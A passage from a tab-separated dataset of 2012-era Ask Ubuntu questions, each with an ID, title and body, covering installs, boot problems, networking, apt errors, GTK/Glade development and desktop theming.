get a working install when dpkg -- configure -a fails ?
153144	how can i recursively search for directory names with a particular string where the string is only part of the directory name	how can i recursively search for directory names with a particular string where the string is only part of the directory name ? for example : the directory name is `` 8.0.3-99966_en '' , but i want to recursively search for directories with the string `` 99966 '' .
153146	what software packages required to write applet to add to unity panel/bar	i was recently frustrated to find that i could not add the gnome `` sensors-applet '' to the unity bar/panel along the top of the desktop . assuming somebody ( like me perhaps ) wanted to modify an applet like `` sensors-applet '' ( made for gnome desktop ) so it could be added to the unity bar/panel , what source-code and/or libraries would i need to write/modify such software ? could i do something like this by [ more-or-less ] finding an applet that can be added to the unity bar/panel , rip out that part of the code that puts the icon on the panel , then graft that onto the original `` sensors-applet '' in place of the equivalent gnome panel code ? or is this idea totally naive ?
153150	moving windows to another desktop with keyboard shortcuts	i use ubuntu 12.04 ( of course with unity ) and compiz . when i press the ctrl+alt+shift+left arrow current window moves to the left desktop , but it comes back to the previous desktop immediately . what is wrong ? what should i do ?
153151	grub stuck after install	i had windows 7 running initially -- however , because a million people are complaining that the alienware m17 from a few years back running radeo hd3870 x2 are getting bsod 's left and right , i decided to drop it and tried to install 12.04 from usb . i got through the entire installation ok , but when it rebooted i got the grub command line because of an error . i do n't need windows any more , i really just need to get ubuntu installed so i can get back to d3 . lol . what do i do ? i 've tried rebooting from the usb but it does nothing , just kicks me back to grub command line .
153152	user accounts missing on loginscreen after 11.10- > 12.04 upgrade , how to get them back ?	i upgraded to 12.04 from 11.10 . i thought that by upgrading i would n't lose the accounts ( and the release notes make no reference to loosing it ) , yes , i carelessly hit the upgrade button but please tell me if all pictures , videos and songs are gone for good ? in the end , is n't that the reason to go for an upgrade instead of a clean install ?
153153	when will apache 2.4.2 be available in a ppa or normal pkg release ?	so apache 2.4.2 was released on april 17th , 2012 . as of yet , it does n't seem to be in any repositories yet . all i can find out by googling is suggestions of building from the git source . i 'd rather not do this , as it complicates configuration and maintenance . just curious if anyone knows when it will be available in the repositories , or if anyone knows of a ppa that publishes the latest apache versions .
153155	where do i fill the app showdown participation details ?	i never submitted an app to the ubuntu software center . where do i fill this info ? in the ppa ? in a form in the usc ? ... thanks in advance !
153156	12.04 freeze while logging in after logging out for once	i am using ubuntu 12.04 , here are my hardware specifications : intel® core™ i5 cpu m 450 @ 2.40ghz × 4 , 1.9 gib , 32 bit , 77.8 gb . i have several interfaces on my pc such as unity ( default ) , gnome-shell , gnome2 , lxde , kde . and i use lightdm . after logging out from any of these interfaces , it is impossible to login any of them normally without a reboot . the desktop interface just freezes after entering the password . i can see the wallpaper , desktop icons , dash and some basic things . none of them respond to the mouse click . ( mouse is all right . ) and i have to ctrl+alt+f1 to sudo reboot . why should i suffer this ! ? i found many running compiz processes while it is freezing by top .
153167	music lense not displaying music collection	i removed rhythmbox from 12.04 and now my music lense does not display any of my music . is there a way to get that back or do i now have a broken lense ?
153169	static ip issue	i just installed ubuntu 12.04 and i 'm trying to set up my internet access . i just have a wired connection so it should be quite simple . my computer has two interfaces , eth0 and eth1 . i 'm not sure which one my wire is plugged into right now . at first it was working correctly , but then i tried to set a static ip address , and from there it 's not working anymore , even if i cancel the modifications i made . i even tried the other interface , and it 's not working either . right now i just want it to work regardless of the interface . please help me to figure out what is not working properly . one thing i 'm sure of is that both the cable and the router do work , so it 's a linux configuration problem . here 's what i 've done : i 've been to /etc/network/interfaces and i 've added the following : auto eth1 iface eth1 inet static address 192.168.1.100 netmask 255.255.255.0 gateway 192.168.1.1 i doubled checked that these are the correct values for my network . then i did : /etc/init.d/network restart and even tried : ifdown eth1 ifup eth1 i sometimes got the message 'rtnetlink answers : file exists - error when doing ifup on alias eth1:1 on rhel5 . ' sometimes it works just for a while and i do n't understand what 's wrong . right now it 's not working again . if i ping the gateway i get an answer from one of my own interfaces ( apparently ) saying icmp host unreachable i ca n't copy paste so it 's hard to copy the whole output of ifconfig . i would have to do it by hand . but if you ask me for a specific line i can give it to you . it roughly returns : lo : 127.0.0.1 eth0 : link : ethernet inet addr : 192.168.1.3 ( this address range can only come from the dhcp ) bcast : 192.168.1.255 mask 255.255.255.0 eth1 : 192.168.1.100 bcast : 192.168.1.255 mask 255.255.255.0
153171	how do you create a bootable usb stick using windows 7	i 've downloaded ubuntu desktop ( the .iso file that is ) on a windows 7 machine and want to create a bootable usb stick in order to install it onto a laptop which currently has no os . is there a way to do this ?
153172	how can i use find command more efficiently ?	i wanted to know , what is the best way to use the find command efficiently ? i generally use , find [ filename ] [ dir ] which gives me a long list of file names none of them any way related to my search . i simply need to find one file in a particular directory . what is the command for that ?
153175	speaker does n't mute when head phone is plugged	ubuntu 12.04 hp dv7-3170 with codec : idt 92hd75b3x5 i solved this problem by adding the following line to alsa-base.conf options snd-hda-intel model=hp-dv5 enable_msi=1 yesterday after applying all updates via update manager i have no sound on my speakers and on my earphones . if i comment the above line in alsa-base.conf i get sound again and also get my original problem . what can i do to revert changes ... thanks
153177	.sh script wo n't run	i 'm trying to install craftbukkit on my ubuntu 12.04 server . however , i 'm having issues with step seven , which instructs me to run ./craftbukkit.sh . if i run it as a normal user , then i get a permissions error . if i run it using sudo , then i get sudo : ./craftbukkit.sh : command not found . what am i doing wrong ?
153180	i have 3 updates that wo n't update	the 3 updates are generic linux kernel headers , generic linux kernel image , and open sound system ( oss ) compatibility package . these 3 will not update . has any one else have or had this problem ?
153185	how to remove kernels from previous release ?	i upgraded my ubuntu 11.10 system to 12.04 using a cd . after upgrading i try to remove old version kernels that appeared in grub boot menu , using the synaptic package manager . but old kernel packages ( example : linux-image 3.0.0-16-generic ) do not appear in synaptic . when i try to update grub , i see the kernels there . how can i remove them properly ?
153186	how to connect gtk3 button click events to callbacks	so , i 'm developing my 1st app with gtk3 and i do n't know how to link my buttons with their respective defs . can anyone post a tutorial , an example or some docs ? using next things for developing my app : ubuntu 12.04 lts totally updated python 2.7.3 obviously , gtk+ 3 glade 3.12.1 the app which i 'm developing is virtuam ( candidate at the app showdown ! )
153190	anything i should know when using/installing fedora ?	i 've been using ubuntu for a small while now , since march , ergo since 11.10 . i know the terminal , ppas , etc . but now , i plan on dual-booting fedora and ubuntu just to try it . does fedora give you the option to partition your disk and dual boot upon installation or do i have to partition the disk before i go into installation ? they say fedora is n't as user friendly as ubuntu , which i do n't doubt , but what does that mean exactly ? is there anything that i would have no knowledge of before fedora that would be best to have a knowledge of i.e . ppa was completely new to me upon arrival to ubuntu and the terminal was foreign at best . anything else you think i should know ?
153191	where is python source code ?	i have python 2.7 installed for learning purposes ( i 'm a starting programmer reading 'learn python the hard way ' ) and wanted to know how some things were done . i installed it from synaptic and want to know the folder that the source code is in . can anyone help me here ?
153197	google`s chrome wo n't reopen prior windows with `` continue where i left off '' checked	recently chrome stopped reopening the windows/tabs from it previous sessions . is there a way to fix this ?
153199	glade gtk entry get text	sorry for a newbie question but i could not figure out how to print a text which a user enter in a gtkentry field after he press a button . i design my app with glade , a simple textentry field and a button . after i change the code of myappwindow.py : def on_button1_clicked ( self , widget , data=none ) : print 'pressed' def entry1_changed_cb ( self , widget , data=none ) : return widget.get_text ( ) but now i could n't find out how to print the text of the entry field after the user pressed the button . thanks for any help !
153200	dual-boot : blank screen after choosing ubuntu	i have a problem but i do n't know exactly what it is about problem . installed ubuntu 12.04 on in my laptop by two ways : by a bootable dvd and another way by wubi.exe , but it does not work . when i reboot in my computer with wubi installed so i see two options for entering the this os ( windows 7 and ubuntu ) but when i select ubuntu i did n't see anything in my screen laptop .
153201	when i select a file in dolphin the name disappears	i 'm using dolphin under gnome 3 and when i select a file , the name disappears . i tried looking at my kde settings and looking under colors and nothing seems out of the ordinary , and i do n't know if that is where dolphin is getting its colors from since i 'm using gnome 3 . i 'm using ambiance for a color theme , so i looked in /usr/share/themes/ambiance/gtk-3.0/gtk.css and saw base color is white and so is selected fg color . so i changed them to black and got nothing . it appears that dolphin is getting its color information from gnome 3 since when changing from ambiance to adwaita the colors change in dolphin . so how do i get the filename not to disappear when i select a file in dolphin and hover over it ? thanks
153202	is there a way to use the `` primary toolbar '' with qt or java ?	i am developping a software in order to compete in the ubuntu app contest , but i am having a problem . i started with quickly and glade , but since i am not very familiar with python , and since now the rules of the contest changed and we can use whatever language we want . i just wanted to use qt or java . but i 'm having the same problem as when i was trying to use quickly with python and glade ... i did n't find a way to have the toolbar set as primary in order to appear with the ambiance/radiance theme from ubuntu ( which is a better looking one than the original ) .. how can i solve this problem ? thanks in advance , luis da costa
153204	how can i stop ubuntu 12.04 from mounting fedora 16 's swap partition ?	i recently installed fedora and ubuntu 12.04 . both have different swap partition . fedora using its own swap space . but ubuntu using both two swap partitions . i want to stop that . i want ubuntu 12 to use its own swap partition . sda9 - ubuntu ( / ) sda11 - swap ( 4.9 gb ) sda10 - fedora ( / ) sda12 - swap ( 4.9 gb ) all are logical partitions .
153209	where are 'comments ' on files/folders under kde stored ?	under kde , i can add 'comments ' to any file/folder . where is all this data stored ?
153221	unity equivalent of kde 'comments ' feature	under kde , i can add 'comments ' to any file/folder . i consider it the digital analogue of 'sticky notes ' on physical files . can i get the same/similar behaviour in unity/gnome ? if yes , how ? if no , why ?
153222	is there a way to find out what is the name of an icon that is on the bottom bar , on gnome 3 ?	is there a way to find out what is the name of an icon that is on the bottom bar , on gnome 3 ? for example , the name of the icon of audacious is audacious , for dropbox it 's dropbox ... i need their names to write them down on the status icon fixer extension for gnome 3 . i have tried : statusicondispatcher.standard_tray_icon_implementations [ 'libreoffice 3.5 quickstarter ' ] = 'libreoffice 3.5 quickstarter ' ; but it did n't work . i need the name for the google chrome background tray icon and libreoffice 3.5 quickstarter . thank you !
153226	how do i install php-fpm 5.4 on 12.04 ?	i would like to install php 5.4 with fpm on a 12.04 virtual machine . the popular ppa solution for installing php 5.4 does n't seem to include the php5-fpm package . what 's the best way to install this version ?
153230	images not working with glade ?	i am sorry if it appears that i am spamming , i am just trying to learn as much about ubuntu development as possible . i have this basic quickly app set up and working fine . i have one image on the first form/view or what ever it is called . i have put the image file in the projectname/data/media/ folder as a png with gimp . it shows up fine in glade . i save then i type : quickly run then it just shows up the icon for file n/a . it says this in the console : could not load image 'step1.png ' : failed to open file '/home/jtp/projectnamme/data/ui/step1.png ' :
153231	share folder between two ubuntu machines , one of them does n't have internet connection	i wondered if i could share folders between two ubuntu machines , even if one of them does n't have internet connection . in fact , i searched all day long for a way to do that , but all i found is that i should install samba or openssh , but i actually ca n't cause as i said , i do n't have internet on one of the two pcs . first i tried to find a way to share the internet connection , but i was told that it was n't possible while i did n't have two network cards in the pc that was connected to the internet . i would be grateful if someone could give me an answer .
153238	eclipse-cdt wo n't debug my c++ programs	i 've installed eclipse from ubuntu repositories and i installed cdt from `` install new software . '' but every time i try to debug a simple program , an error occurs that says 'launching q.cpp debug ' encountered a problem `` program file does not exist '' also there is nothing in run > debug as . what should i do ? when i type commands , the eclipse command corrector ( i do n't know what it is called ) does n't show me any any commands to help me to choose the correct one .
153243	i 'm a beginner using ubundu 12.04 , i 'm getting this error message whenever i try to update manually . hope somebody will help . thanks	reading package lists ... done w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //archive.ubuntu.com precise-updates release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-updates/release w : some index files failed to download . they have been ignored , or old ones used instead .
153245	how to wipe ram on shutdown ( prevent cold boot attacks ) ?	my system is encrypted using full disk encryption , i.e . everything except /boot is encrypted using dmcrypt/luks . i am concerned about cold boot attacks . prior work : https : //tails.boum.org/contribute/design/memory_erasure/ http : //tails.boum.org/forum/ram_wipe_script/ http : //dee.su/liberte-security http : //forum.dee.su/topic/stand-alone-implementation-of-your-ram-wipe-scripts can you please provide instructions on how to wipe the ram once ubuntu is shutdown/restarted ? thanks for your efforts !
153251	launch shell scripts from anywhere	is it possible to run my scripts located in ~/scripts from anywhere ? say i want to run ./scriptname regardless of my current working directory .
153256	backup failed - got status code 500	my automatic backup has n't worked for a couple of days now . everything was just peachy and i 'm not sure what went wrong . the message just says : backup failed got status code 500 no further information is given or offered . i 'm using ubuntu 12.04 . any help would be greatly appreciated . thanks !
153260	how can i authenticate ubuntu software center with user password ?	i would like to be able to use the password associated with this account to install packages with the gui . ideally , i would change the settings so that any user with sudo permissions could install packages . if that is not possible , i would like to be able to list all users that should be able to install . i know that this involves making changes to policy kit , and i have read a page with a similar question . however , i must need information specific to my own problem , because all my attempts so far have failed .
153265	what does the `` basic ubuntu server '' package contain in software selection during installation ?	i 'm installing ubuntu 12.04 from an ubuntu minimal image , and i 've gotten to the software selection part . what i 'm wondering is , which packages are included in the `` basic ubuntu server '' option ? i 'm assuming it 's a bundle of packages , but which exactly are included in it ?
153266	how do i configure ubuntu server as primary domain controller for windows 7	i have a mac server running os x server 10.5 server and as a pdc for our windows xp systems . i 'd like to use the os x server as a pdc for our windows 7 boxes but the version of samba in os x server is not compatible with windows 7 . it appears that my best bet is to use ubuntu server as my pdc . i want the windows boxes to obtain authentication information from the mac server 's ldap . any suggestions are appreciated .
153272	i ca n't install ubuntu on my dell latitude d510	i download the iso from ubuntu.com and burned into a cd-r with the program in the page . the disc work right in my desktop but when i run it in my laptop appears another menu with the options prove ubuntu , install ubuntu , check the memory , check for errors , and run windows.when i try the option install appears in the screen `` ubuntu '' in the center and littles points down ( loading ) and after 5 minutes the computer freeze . what can i do ?
153275	unity -- reset in 12.04 does n't work	i was trying to disable the 'global menu ' feature in unity , and unity began to malfunction . i was unable to move windows , the left menu bar had disappeared , and the top panel was also gone . i could n't open a terminal as i could n't move windows to get to my shortcut . i used a virtual terminal ( tty2 ) , logged in , used sudo , and executed # unity -- reset but it never finished . i have pasted the output here
153276	multiple passwords per user	is it possible to allow multiple passwords to log on to ubuntu for the same user ? i have also possibly considered having two users share a home folder , but i am not sure if that is safe . if anybody can provide guidance , that would be great .
153279	can installing ubuntu cause windows to run hot on dual boot machine ?	okay , i 'm pretty sure that it is not possible for ubuntu to cause hardware problems with windows but.. i installed 12.04 as a dual boot on a compaq presario cq61 running windows 7 home premium . install ran flawlessly and dual boot works fine . like many other people , i noticed my machine ran very hot when using ubuntu . weird part is it now also seems to be running hotter when i 'm in windows . common sense and what little i know about computers tells me that there could n't possibly be a connection but i want to check with the community just in case . thanks in advance .
153284	i ca n't return to windows	i have 3 partitions , c with windows , d for games and stuff , and h where my ubuntu is . i installed ubuntu with the `` something else '' option and now i ca n't return to windows . i tried deleting the partition where linux is , but its still running . please help ! i want my windows back . ok so i started gparted and thats what it appears http : //imgur.com/amqhk .
153290	menu font background color is white	something happened to my theme ( i guess ) where all the menu 's font background color is white . this is for all menus , right click mouse menu and that top menu bar . i 'm new to ubuntu and i 'm trying it out . i was following some instructions on changing themes ... something about installing gnome 3.4 . and now my menu 's are all messed up . when i try and use ubuntu tweak to change the theme it wo n't let me select a different one . it 's just stuck on ambient . i saw the setting to unlock themes but that does n't help . the option menu pops up with the list of different themes but i am not able to select any . i would take a screen shot but the print screen button does not work when i have a menu open . heh i 'm not even sure i 'm asking this correctly . i have done some reading on the gtk-3.0.css and unity.css files . i 'm not sure if they were edited or not , could some one post the default files for me ?
153291	no 3d after installing updates on fresh ubuntu 12.04	i 've just purchased my laptop hp pavilion g7-1390ed . my graphic card is amd radeon hd7450m with 1gb ram . first after i installed ubuntu 12.04 3d was working fine , but after installing other updates including amd radeon video drivers and restart 3d is not working . it only runs with 2d . i hope someone knows how to fix this ?
153294	ubuntu wo n't boot after install usb\cd	i want to replace windows with ubuntu , so i installed it on my hard drive from a usb stick and a cd , but every time i try to install it , and when it gets done installing , i reboot the computer but all i get is a black screen with a small line ( the line that marks where you are going to type ) , like its trying to boot from something but it cant find it ( i 've tried to install it about 10 times ) . i have tried to leave the black screen up for 30min to see if it would boot , but nothing . i tried to leave the live ubuntu up all night to see if it was still installing , but nothing , nothing but that black screen . i 've also tried installing it onto my usb stick but when i boot from it it says `` press any key to reboot . '' and if i press anything it just reboots . so can anyone help ? computer info : hp pavilion 520n intel ( r ) celeron ( tm ) cpu 1300mhz 1.30 ghz , 512 mb of ram
153298	can not get .trash-1000 working on ntfs auto mount ?	i am using fstab to automount a ntfs dive ... but i can not get the trash folder to work ... . the line when i auto mount in fstab is : /dev/sdc1 /media/data ntfs-3g defaults , uid-1000 , locale=en_us.utf8 0 2 my user id is 1000 when i do id -u username . i have tried to make a dir called .trash-1000 and also tried .trash on the root of the ntfs drive ... and i chmoded it .
153306	is there a recommended db to work with quickly ?	couchdb used to be the recommended db to work with quickly until 12.04 , when it was dropped out . now , i want to know if there is another db recommended to replace couchdb that works nicely with quickly/python ? .
153310	show position of pointer	there 's an option for ubuntu 's mouse that says 'show position of the mouse when the control key is pressed. ' . this function is required permanently enabled for a certain script i run , but on the other side it makes blender 'control ' key not to work ( as in ctrl+z , which is annoying ) nor in some other apps ( like the game limbo ) . so , how can i solve this problem ? there are three solutions i can think of , but i do n't know how to implement any of them . change the key being clicked . if i could show mouse position with , say , tab , that 'd be perfectly fine . to show the mouse with a script . this would be the best actually ( currently i 'm using xte to emulate the ctrl key pressing ) . running something like show-mouse in a terminal would be great . could n't find anything through google though . make these programs to recognize the control pressing apart of gnome/ubuntu . this is probably a bug so this should be the hardest way to solve . edit there is another option worth considering , i can send a gnome notification so it 's displayed when i touch the screen on the main screen instead of around the mouse . however , it displays for a really long time , which is a known bug . it 's worth considering in case it is solved . thank you so much ! ps , the solutions here did n't work for me . ubuntu 12.04
153311	mplayer not working after update	after an update with update-manager in 12.04 , mplayer is not working anymore . it needs ffmpeg , but it ca n't be installed due to unmet dependencies . i added a ppa for ffmpeg , but did not solve the problem . see output : python ( v2.7 ) requires to install ... . gstreamer ffmpeg video plugin . codecs to play mpeg , divx , mpeg4 , ac3 , wmv and asf files . using install , i get an error messages that it ca n't be installed due to unmet dependencies . see list below : the following packages have unmet dependencies : gstreamer0.10-ffmpeg : depends : libavcodec-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libavformat-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.7.3-1 ) but 6:0.10.4.0ubuntu0jon2.2 is to be installed depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10 is to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.32.3-0ubuntu1 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.31 ) but 0.10.36-1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.16 ) but 1:0.4.16-1ubuntu2 is to be installed depends : libpostproc-extra-52 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libswscale-extra-2 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed how can i fix this problem ?
153313	how do you make bastille work and secure ubuntu 12.04 ? it doesnt work for me `sudo bastille -x`	i was able to install bastille from the normal repositories and then run the gui . after going through the options and clicking ok to apply , it showed these errors . do you know why bastille wont work on ubuntu 12.04 ? note : executing psad specific configuration note : executing file permissions specific configuration note : executing account security specific configuration note : executing boot security specific configuration error : unable to open /etc/inittab as the swap file /etc/inittab.bastille already exists . rename the swap file to allow bastille to make desired file modifications . error : open /etc/inittab.bastille failed ... error : open /etc/inittab failed . error : could n't insert line to /etc/inittab , since open failed.note : executing inetd specific configuration
153316	how to make a sound effect play whenever i click ?	i know that sounds like a weird idea , but i kinda want to experiment with this . over the past few months , i 've kinda turned ubuntu into my own little frankenstein 's monster , but whatever you tell me should still work . preferably for oneiric ocelot .
153318	`apt-get upgrade` fails intermittantly with `` hash sum mismatch '' , and must be rerun	a number of times recently over the last few months when i try and apt-get update & apt-get dist-upgrade i get the following error while apt is downloading a package ... failed to fetch http : //foo/bar.deb hash sum mismatch e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? upon getting this error i rerun upgrade immediately and it will usually progress until another package with the same error . after rerunning upgrade a few times everything completes successfully . the errors occur with multiple different package sites including the official ubuntu ones . i have n't had any problems with my internet connection or wget otherwise .
153320	what 's the best way to add a directory to ld_library_path ?	i installed an application in a non-standard place . when i run it i get error while loading shared libraries : libthrift-0.9.0-dev.so : can not open shared object file : no such file or directory i can fix this by adding the directory to the environmental variable $ ld_library_path , but i wonder if there 's a better solution .
153321	is there flash support for a radeon hd 4650 agp video card in ubuntu 12.04 ?	i recently upgraded my video card from an evga geforce 6200 to a radeon hd 4650 agp video card . after doing some research , i found that this radeon card was basically the best agp card available , and it had flash support ( according to the adobe flash website ) for gpu acceleration . however , after re-installing 12.04 and the recommended driver via jockey , flash is still choppy and hogs the cpu resources . any suggestions ? i 've had some trouble finding information anywhere . also , i 've got a new power supply on the way which will be a 400w ( the specified `` minimum '' required according to the amd specs ) . it will be replacing the existing 170w psu . could my troubles be due to an insufficient power supply ? everything else seems to work well graphically . i just want flash support so i can stream smooth videos . thanks for any help ! computer specs : dell dimension 4550 cpu : 3.0ghz pentium 4 with hyperthreading 1.5 gigs ram agp video card slot
153325	will linux kernel 3.5 be coming to 12.04 ?	i 'm wondering if kernel 3.5 or 3.6 will be available for ubuntu 12.04 when the kernel is officially released ?
153326	passwordless su in a bash script ?	i 've run into a dilemma while migrating a hadoop installation from oracle enterprise linux to ubuntu . the prior developer put the following command into rc.local within oel : su reporter -c `` cd /path/to/directorywithscript & & bash runwebserver.sh > > /dev/null 2 > & 1 & '' i need the above webserver to automatically start ( and stop ) in ubuntu as the specified reporter user . ( the automation stuff is much less important than getting this script to properly run as the reporter user , but is a `` nice to have '' feature . ) this process needs to start last , as i still need to configure a couple of other hadoop-related scripts to automatically start before this one ( the webserver resides in the hadoop filesystem , which does n't get mounted until after you 're in the os ) . every time i issue the su command i get asked for a password . this occurs regardless of which user is currently `` active '' and was n't a problem in oel since the root user is actually used . here is my current attempt at a /etc/sudoers file , but it 's still not working ( i 'm unsure if the changes i made at the bottom are correct ) : # /etc/sudoers # # this file must be edited with the 'visudo ' command as root . # # see the man page for details on how to write a sudoers file . # defaults env_reset # host alias specification # user alias specification # cmnd alias specification # user privilege specification # allow members of group sudo to execute any command after they have # provided their password # ( note that later entries override this , so you might need to move # it further down ) % sudo all= ( all ) all # # includedir /etc/sudoers.d # members of the admin group may gain root privileges % admin all= ( all ) all # user privilege specification root all= ( all ) all user3 all= ( all ) nopasswd : /bin/su user2 all= ( all ) nopasswd : /bin/su user1 all= ( all ) nopasswd : /bin/su reporter all= ( all ) nopasswd : /bin/su this is a duplicate of a thread i posted over at ubuntuforums.org ( http : //ubuntuforums.org/showthread.php ? p=12040341 # post12040341 ) , but i 'm getting desperate for an answer =p . please note that my linux knowledge is still weak ( i knew almost no linux before this project was dropped in my lap ) . any help is greatly appreciated as this is currently a major stumbling block ! thanks , -snipe
153333	always on vpn connection	i have a working vpn connection . works like a dream . what is n't working though , is the 'connect automatically ' option in the network connections manager panel . it never connects automatically , not at boot , and not after disconnect . i 'm not quite sure what that option is for . and i 'll get disconnected from the vpn with no warning whatsoever . is there a way to make sure my computer only connects to the internet through a vpn ? so that if the vpn connection is n't established , my computer ca n't reach the internet . and is there a way to get ubuntu to attempt to reconnect to the vpn automatically if for some reason the connection drops ?
153334	how do i uninstall the hud altogether ?	i do n't want to just disable the key binding to invoke the hud , i want to remove the hud . i notice in system monitor that something called hud-service is taking up 65 megabytes . besides that , i 'm always invoking the hud by accident merely by going back a page in a web browser . so i 'd like to just completely uninstall anything pertaining to the hud . is this possible ?
153337	cursor seems to freeze in the first attempt of typing - unity 3d , 12.04	it happens in the first attempt of typing , no matter is after the startup , or 5 minutes later , or then after . the cursor ( or maybe it 's the system ) seems to freeze , no matter the application i use , taking up 5 sec to appear what is typed . subsequently , everything is normal , using another applications . @ anwar shah suggested it could be a daemon waiting to run before the lauching of the first application . turning off zeitgest did n't help . it occurs only with unity-3d . tested with unity-2d , everything is fine . tried to change some compiz settings , nothing worked , although not tested with every single parameter . also i deactivated ati proprietary driver , no effect . my system : amd e350 1.6gh , 2g-ram , ati graphics - ubuntu 12.04 , 64bits . update 1 : the cursor is blinking normally before i start typing . after the first character ( which is not showed ) , seems to freeze , taking 5 seconds to get normal again . very annoying , specially when you want to access login sites . update 2 : i tested on a different and old machine ( athlon 64 4800 x2 , 4gb ram , no problems - takes 2 seconds , acceptable . i think it could be related to my specific hardware ( samsung rv415 ) , but not sure about it . anyone experiencing something similar ? is that what i should expect , or can be fixed or improved ? thanks .
153340	why is skype startup sound scratchy/grainy ?	when i start skype , the startup sound sounds like that my speakers is going to break any time ( kind of like nails scratching a blackboard ) . but when i go to /usr/share/skype/sounds to find the startup sound , i opened it and the file does n't sound anything wrong . how do i fix this ? it sounds bad no matter how i start it .
153343	why apt-get does n't install the newest software	i tried installing some software using apt-get or default software manager . unfortunately , it did n't install the newest available software , e.g . conky installed version is 1.8.1 , while the newest is 1.9 , netbeans is 7.0.1 instead of 7.1.2 . what should i add or what should i change to install the newest software ?
153345	xfce session will not login from login prompt . why ?	well , not sure how i did it , but for some reason i am unable to get past the login screen on xfce . what 's odd is that i had set the machine up ( from install ) to login automatically . then when i finish rebooting after installing sudo apt-get install openssh-server and sudo apt-get install vnc4server all the sudden i am getting prompted for my password . i proceed to type my password ( successfully might i add ) to login , the screen goes black for a second , then brings me right back to the same password prompt . i am able ssh in ( now ) , but i get no love from workstation login . maybe vnc4server is the culprit ? what did i do ? and can i fix it ? edit : the guest account , however will let me login no problem . what gives ? i have a sneaking feeling that this could be permission issue . edit 2 : also , i did find this form ( the exact same setup as i have with same symptoms ) , makes mention of the .xauthority file needing to be delete . i do n't mind trying things , but deleting stuff scares me a bit .
153349	what 's the best way to get a file from one computer on my network to another ?	i have a desktop , a laptop running ubuntu and an old box running ubuntu server with no gui or monitor . i need a reliable way to move files from the desktop and the laptop to the server . i am now sshing into the server from the two client computers . could i use that to transfer files , too ? should i set up some sort of ftp communication ?
153354	unable to login to ubuntu permissions issue ?	well , i think i royally messed this one up . in the process of changing permissions in my home directory , i now ca n't login using any of the 3 accounts i had setup , except for the guest account . i was using the chmod command from the terminal and received an error . well i reboot for whatever reason and like i said , cant login . any suggestions for a newbie to get this fixed ?
153356	how to get past black screen with mouse icon while installing on gateway mx6920 ?	i have an old gateway mx6920 laptop that got a virus on its hard drive so i put in a new one from another laptop . when i turn it on it tries to load windows but fails so i 'm going to try to put ubuntu on it ( because i heard it 's a good os ) . i downloaded the 32-bit desktop version of ubuntu and burned it to a cd . i put the cd in the computer , went to the boot menu , and selected cd-rom . the computer tries to boot but stops at a black screen with a mouse icon sitting in the middle of the display . i have no idea what 's going on , so please help .
153358	can not get script to run at startup ( tried all the simple answers )	i have ubuntu desktop 12.04 lts running great on an older acer desktop . i want to use this machine as an in-home server for hosting minecraft . the command to start the minecraft server is java -xmx1024m -xms1024m -jar minecraft_server.jar nogui and that works great when i cd into the correct directory and execute the above . i created a script to do this : # ! /bin/bash cd /home/myuser/minecraft-server1 java -xmx1024m -xms1024m -jar minecraft_server.jar nogui & cd /home/myuser/minecraft-server2 java -xmx1024m -xms1024m -jar minecraft_server.jar nogui & exit 0 i made this .sh file executable , and it too runs great when i start it manually from the terminal . the problem i 'm having is getting these to execute at startup . i have my user account on this machine to auto login . i have tried the following : adding the following to `` startup applications '' : sh /home/myuser/myscript.sh ( nothing happens on reboot ) adding the same to /etc/rc.local ( nothing happens on reboot ) . i even tested this one by running /etc/rc.local from the terminal , and it executed great . just not at boot/auto login added the lines from the script directly to rc.local ( nothing happens on reboot ) . i ca n't help but think that there 's something i 'm missing . the script executes great when run manually , but will not run at boot/auto login . many thanks in advance .
153361	domain resolution - local first then external	i would like to know how i can configure my dns settings so that domain is resolved locally first , then if not resolved it goes to external dns . i had this working before , i am using ubuntu through a vm and need the local domain to resolve first but since i have upgraded i had to reconfigure network and now it works only external , local host file does not seem to even be used . is there an easy way to check this out ? i did slap it up in google but no specific answer seemed to match my case and i too tight on delivery deadline to test-and-try different approaches . you guys rock , thanks .
153363	are there any standard ui / ux / design principles or guidelines for building ubuntu apps ?	are there any standard ui / ux / design principles or guidelines for building ubuntu apps ? i 'm creating my first app and am afraid it will be too `` webappish '' .
153368	how do i access the preferences from my main dialog window ? also how do i add a new preference ?	class preferencescalorieburnerdialog ( preferencesdialog ) : __gtype_name__ = `` preferencescalorieburnerdialog '' def finish_initializing ( self , builder ) : # pylint : disable=e1002 `` '' '' set up the preferences dialog '' '' '' super ( preferencescalorieburnerdialog , self ) .finish_initializing ( builder ) # bind each preference widget to gsettings settings = gio.settings ( `` net.launchpad.calorie-burner '' ) widget = self.builder.get_object ( 'example_entry ' ) settings.bind ( `` example '' , widget , `` text '' , gio.settingsbindflags.default ) # custom preference widget = self.builder.get_object ( 'weight ' ) settings.bind ( `` weight '' , widget , `` float '' , gio.settingsbindflags.default ) main dialog self.preferencesdialog.get_weight ( ) ? ? ?
153369	calibre icon missing from system tray	after installing calibre , i immediately changed the preferences particularly by enabling system tray icon . the program restarted , as required , but the icon did n't appear on my sys tray . so i tried restarting my laptop , but still the same negative result . i have already whitelisted all apps after installing my os so the problem is likely not that . is there another solution for this ? i 'm using 12.04 64-bit on my thinkpad r61i .
153376	broken gtk theme ?	all my menus are highlighted like in the attached image . http : //i.imgur.com/gvoih.png i asked around and someone told me my gtk theme might be broken . however , i have no clue how to fix it . this occurs on my system menus , de changer in the login menu , and most other programs .
